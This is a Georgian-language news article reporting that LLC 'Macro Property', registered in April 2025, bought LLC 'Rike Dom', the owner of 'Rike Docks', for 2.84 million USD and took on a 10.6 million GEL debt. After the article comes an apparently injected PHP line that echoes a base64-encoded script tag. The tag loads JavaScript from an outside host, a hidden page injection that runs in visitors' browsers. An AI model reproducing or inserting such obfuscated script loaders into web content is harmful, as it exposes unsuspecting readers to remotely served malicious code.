gorgia
jaluzi

„რიყის დოქების“ მფლობელი კვლავ შეიცვალა, საჯარო რეესტრის მონაცემებით, „რიყე დომ“-ის მესაკუთრემ კომპანია 2025 წლის 3 ივნისს გაასხვისა.

უფრო კონკრეტულად, რეესტრში შესული განაცხადიდან ირკვევა, რომ შპს „ნ.გ.ბ“-მ მიმართა რეესტრს, რათა „რიყის დოქების“ მესაკუთრე კომპანიაში - შპს „რიყე დომ“-ში მისი კუთვნილი 100%-იანი წილი სრულად გადასცემოდა შპს „მაქრო ფროფერთის“.

ამავე მონაცემების მიხედვით, „მაქრო ფროფერთმა“ „რიყე დომ“-ში წილები 2 840 000 აშშ დოლარად შეიძინა. ამასთანავე, წილების ახალი მესაკუთრე ინფორმირებულია იმის შესახებ, რომ „რიყე დომს“ GLOBAL VICTORY TRUST-თან ფინანსური ვალდებულება აქვს და აცხადებს, რომ სამ ეტაპად გადაუხდის კომპანიას ჯამში 10.6 მილიონ ლარს.

შპს „მაქრო ფროფერთი“ სამეწარმეო რეესტრში 2025 წლის აპრილში დარეგისტრირდა. კომპანიაში დირექტორის პოზიციას იკავებენ ბიზნესმენი მიხეილ ტყეშელაშვილი და თურქეთის მოქალაქე ომერ ქირაჩი. წილებს სრულად ფლობს შპს „მაქრო ქონსთრაქშენი“. თავის მხრივ, 2013 წელს რეგისტრირებული „მაქრო ქონსთრაქშენის“ წილებს სრულად ფლობს თურქეთის მოქალაქე ემინ უჩარი.

ცნობისთვის, 2025 წლის 5 მაისს ცნობილი გახდა, რომ დავით ხიდაშელმა „რიყის დოქები“ გაყიდა. საჯარო რეესტრის ამონაწერის მიხედვით, მისი მფლობელი შპს „რიყე დომ“ გახდა.

109
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");